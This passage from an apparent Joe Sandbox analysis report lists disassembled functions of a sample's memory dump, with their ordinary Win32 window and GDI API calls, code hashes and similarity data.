                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Window$Long
                                                    • String ID:
                                                    • API String ID: 847901565-0
                                                    • Opcode ID: 257e4bdc3cce589bfcd0bae2cde7dcdcf70e78008d366a96e91da1e4ee422efa
                                                    • Instruction ID: 563bd4cf90cc57f62c43be750e3334376109934199a4b883d45bcee9b45caa6f
                                                    • Opcode Fuzzy Hash: 257e4bdc3cce589bfcd0bae2cde7dcdcf70e78008d366a96e91da1e4ee422efa
                                                    • Instruction Fuzzy Hash: E011D6315006559FDB128F28CC44AAB3BA9FB46374F164724FA39DB6F0DB308921CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00342099 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d3f7ad84767a6d3c251b8d037606dd495a8ca4ede793234a6ef8c83715195904
                                                    • Instruction ID: 6dcf3c4eec843f8af22550bdea43065296fc4e2b05b80f3a97b009ee84f0a9d0
                                                    • Opcode Fuzzy Hash: d3f7ad84767a6d3c251b8d037606dd495a8ca4ede793234a6ef8c83715195904
                                                    • Instruction Fuzzy Hash: 8101A2B26092157EF62326796CC1F6767CDDF523B8F720325B621BD1E1DA70AC814560
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003722B7 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 003722D7
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003722E9
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003722FF
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0037231A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 69f85627eb532155eba3d945dff86730fea445db01885dbc13135996897399bf
                                                    • Instruction ID: 26d55bffacc1c34f846d10ac52bd9d33efb89d41a81194032e378a73b46a7190
                                                    • Opcode Fuzzy Hash: 69f85627eb532155eba3d945dff86730fea445db01885dbc13135996897399bf
                                                    • Instruction Fuzzy Hash: E2110C7A900218FFEB129BA5CD85F9EBBB8EB08750F214091E605B7290D6756E10DB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003AA852 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00312441: GetWindowLongW.USER32(00000000,000000EB), ref: 00312452
                                                    • GetClientRect.USER32 ref: 003AA890
                                                    • GetCursorPos.USER32(?), ref: 003AA89A
                                                    • ScreenToClient.USER32 ref: 003AA8A5
                                                    • DefDlgProcW.USER32(?,00000020,?,00000000,?), ref: 003AA8D9
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                    • String ID:
                                                    • API String ID: 4127811313-0
                                                    • Opcode ID: d0c46e6d0825df9c07abcd123c77f8cb2cfff18538920268f22eb46d160a8daa
                                                    • Instruction ID: d554ae9467926b442cbf948d6330ee71630748497d3d375ee26ed4088ed851d6
                                                    • Opcode Fuzzy Hash: d0c46e6d0825df9c07abcd123c77f8cb2cfff18538920268f22eb46d160a8daa
                                                    • Instruction Fuzzy Hash: EF113672900519EFDF16DF98D8899EE7BBCEF06301F000555F912E6150D738AA92CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037EA02 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 0037EA29
                                                    • MessageBoxW.USER32(?,?,?,?), ref: 0037EA5C
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0037EA72
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0037EA79
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                    • String ID:
                                                    • API String ID: 2880819207-0
                                                    • Opcode ID: 9a406eb027cd486fc6d9b96c4284ad4e68eb8f966263c36ff75f53c79ddb4d0b
                                                    • Instruction ID: 9529715899274f5357373596b7c11961444681a68de1e4ae2e58a0060d34e904
                                                    • Opcode Fuzzy Hash: 9a406eb027cd486fc6d9b96c4284ad4e68eb8f966263c36ff75f53c79ddb4d0b
                                                    • Instruction Fuzzy Hash: 0711DF75900259BFC713DFA89C4599F7F6DAB46310F148256F429D73D0D6788D0487A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A8773 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowRect.USER32 ref: 003A8792
                                                    • ScreenToClient.USER32 ref: 003A87AA
                                                    • ScreenToClient.USER32 ref: 003A87CE
                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 003A87E9
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                    • String ID:
                                                    • API String ID: 357397906-0
                                                    • Opcode ID: 3524476bc4f2dc4925b6a2e21989062739c9efde240ab0bd405a27c29304c232
                                                    • Instruction ID: 73ad208fb57e497d2eee6720c3e239e1dd22918e2359223c33bf61f50477987d
                                                    • Opcode Fuzzy Hash: 3524476bc4f2dc4925b6a2e21989062739c9efde240ab0bd405a27c29304c232
                                                    • Instruction Fuzzy Hash: 941140B9D00209AFDB41CFA8C884AEEBBB9FF09310F508166E915E3620D735AA548F50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00312150 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSysColor.USER32(00000008), ref: 0031216C
                                                    • SetTextColor.GDI32(?,?), ref: 00312176
                                                    • SetBkMode.GDI32(?,00000001), ref: 00312189
                                                    • GetStockObject.GDI32(00000005), ref: 00312191
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Color$ModeObjectStockText
                                                    • String ID:
                                                    • API String ID: 4037423528-0
                                                    • Opcode ID: 1f9410dd1b50245d730b854bce6bc9603222d824d8812e20fedba6bffeb46524
                                                    • Instruction ID: ba423b0b0f7f4b58baa69d3cbce8b7dcb1fdf2911cb6548dc7de5962fed9b9ed
                                                    • Opcode Fuzzy Hash: 1f9410dd1b50245d730b854bce6bc9603222d824d8812e20fedba6bffeb46524
                                                    • Instruction Fuzzy Hash: 73E06D31680280AEDB635B74AC09BE97B24AB13336F048229F7FB484E0C37246959B10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0036EBD6 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: 69caff39e885d3ab7ddd95ea3719906c9fc96ec17b70a22fe74c525dcdc57f11
                                                    • Instruction ID: 6791100bf20ffb6a4090e14d10e708666ff530ab3256e4018d5eabe14396e2fa
                                                    • Opcode Fuzzy Hash: 69caff39e885d3ab7ddd95ea3719906c9fc96ec17b70a22fe74c525dcdc57f11
                                                    • Instruction Fuzzy Hash: A8E01AB4800201DFCB52AFA09808A6DBBB9FB08310F508449E84BA7A20CB3849419F00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0036EBEA Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: 3f815ac84f9e9933ac7a056f5315d202435e0371235050e4c4a36720ef39ed68
                                                    • Instruction ID: 6aea5141d8f951473300b8bac556dd19a01854e41f0dd1d59f6f8fc8efa67d3b
                                                    • Opcode Fuzzy Hash: 3f815ac84f9e9933ac7a056f5315d202435e0371235050e4c4a36720ef39ed68
                                                    • Instruction Fuzzy Hash: 2CE012B0C00200EFCB52AFA09808AADBBB9BB08310F508449E94AA3A20CB3899019F00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0033E60D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __startOneArgErrorHandling.LIBCMT ref: 0033E69D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ErrorHandling__start
                                                    • String ID: pow
                                                    • API String ID: 3213639722-2276729525
                                                    • Opcode ID: 9aab2b4ac8a230bfd8693c8913a185152ef23b003fd3e13ce0d9d2440a25216c
                                                    • Instruction ID: 6c173515acdfe3703753ceaddef79a3460d6763dcd1555b1e0219619793a1a49
                                                    • Opcode Fuzzy Hash: 9aab2b4ac8a230bfd8693c8913a185152ef23b003fd3e13ce0d9d2440a25216c
                                                    • Instruction Fuzzy Hash: 96513761E0810296DB137B18DD823BF2BE8AB50740F318E59F0D54E2F9EF359C969A46
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0032A86C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #
                                                    • API String ID: 0-1885708031
                                                    • Opcode ID: a134e82d853e498673aa1c1b4be085edaebdf4eecc48de2ff14ef4a2b86e95be
                                                    • Instruction ID: fefb6fb25359df13669e4dadfaf2459f249e6dc54b9529dc07d4aa218561b5dd
                                                    • Opcode Fuzzy Hash: a134e82d853e498673aa1c1b4be085edaebdf4eecc48de2ff14ef4a2b86e95be
                                                    • Instruction Fuzzy Hash: 0751343050425ADFCF27DF2AE440AFA7BA5EF19310F2A8155E8919B2D0DF309D82CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003960A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper_wcslen
                                                    • String ID: CALLARGARRAY
                                                    • API String ID: 157775604-1150593374
                                                    • Opcode ID: 0215b7864fe9edb1c8f058ae093bb0316bc33f7d8da641183c479e25a69cc647
                                                    • Instruction ID: bc9237b8cd836de333afe690476552232f1194cc6a8892afb92620517f5fb14e
                                                    • Opcode Fuzzy Hash: 0215b7864fe9edb1c8f058ae093bb0316bc33f7d8da641183c479e25a69cc647
                                                    • Instruction Fuzzy Hash: 1341B375A012199FCF06EFA8C8928FEBBB5FF59320F154169E406AB352D7709D81CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A4E96 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 003A4F7E
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003A4F93
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: '
                                                    • API String ID: 3850602802-1997036262
                                                    • Opcode ID: 8dbf40eeb3e889d34662c73674cc3b3011483fb4fbde68f03fcbf4e3cbb80527
                                                    • Instruction ID: 6aceafe583ba212070c662889a8b2b0c4b00c1bc32bff96759ca9ffe2fbc56ec
                                                    • Opcode Fuzzy Hash: 8dbf40eeb3e889d34662c73674cc3b3011483fb4fbde68f03fcbf4e3cbb80527
                                                    • Instruction Fuzzy Hash: 76312C74A01309DFDB15CFA9C880BDABBB9FF89304F11516AE905AB391D7B1A941CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A406F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0031771B: CreateWindowExW.USER32 ref: 00317759
                                                      • Part of subcall function 0031771B: GetStockObject.GDI32(00000011), ref: 0031776D
                                                      • Part of subcall function 0031771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00317777
                                                    • GetWindowRect.USER32 ref: 003A40D9
                                                    • GetSysColor.USER32(00000012), ref: 003A40F3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                    • String ID: static
                                                    • API String ID: 1983116058-2160076837
                                                    • Opcode ID: adc0352445ac668fd8b492cdb1d859ed0fad02e6ce060c5f5f49bd8e9cc70983
                                                    • Instruction ID: 7d48c9ebb7c399ee28e49f859aad1c4fae639e90c2850cb775845039fb46cc4f
                                                    • Opcode Fuzzy Hash: adc0352445ac668fd8b492cdb1d859ed0fad02e6ce060c5f5f49bd8e9cc70983
                                                    • Instruction Fuzzy Hash: 90113772610209AFDB02DFB8CC46AFA7BB8FB49314F014924F956E7250E774E891DB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037256E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0031B25F: _wcslen.LIBCMT ref: 0031B269
                                                      • Part of subcall function 00374536: GetClassNameW.USER32 ref: 00374559
                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 003725DC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_wcslen
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 624084870-1403004172
                                                    • Opcode ID: 5a07d53b6f06949a9bcb0e22fb2f351c4a20ca5d511f91315a97c165c9ff34ed
                                                    • Instruction ID: ed61189365bed438f95f55f53b9226f6e730d54b9678f602d7b2ba83c749a84d
                                                    • Opcode Fuzzy Hash: 5a07d53b6f06949a9bcb0e22fb2f351c4a20ca5d511f91315a97c165c9ff34ed
                                                    • Instruction Fuzzy Hash: A701D871600115ABCB2AEBA4DC51CFFB768EF5B320B04461AF8769B3D6EB34980D9750
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00372468 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0031B25F: _wcslen.LIBCMT ref: 0031B269
                                                      • Part of subcall function 00374536: GetClassNameW.USER32 ref: 00374559
                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 003724D6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_wcslen
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 624084870-1403004172
                                                    • Opcode ID: 5d32bccee892524e4597aef1f06968262e1d8d7ac03d234c4dd0d789ca976b8d
                                                    • Instruction ID: b4434271d0a8c2986f2f4d901c8903201e1ef5aedb69bde5a2a422d20e200d79
                                                    • Opcode Fuzzy Hash: 5d32bccee892524e4597aef1f06968262e1d8d7ac03d234c4dd0d789ca976b8d
                                                    • Instruction Fuzzy Hash: 2401F771A00109ABCB3BEBA1D852EFFB7A89F1A300F14401AA44667282DB249E08C671
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003724EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0031B25F: _wcslen.LIBCMT ref: 0031B269
                                                      • Part of subcall function 00374536: GetClassNameW.USER32 ref: 00374559
                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00372558
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_wcslen
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 624084870-1403004172
                                                    • Opcode ID: e1de86492453992356c714c1b47f8b7fb284804728b367dc31c370fae7ccdd77
                                                    • Instruction ID: 84e35b14d86455ac92b88cdf362f6017b6a1ea9a123314ed931a3d247976620d
                                                    • Opcode Fuzzy Hash: e1de86492453992356c714c1b47f8b7fb284804728b367dc31c370fae7ccdd77
                                                    • Instruction Fuzzy Hash: 7901DB71640105A7CB2BEBA4D912FFFF7AC9F1A750F144116B44677282EB289F0D8671
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003725F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                    Download Yara Rule
                                                    APIs
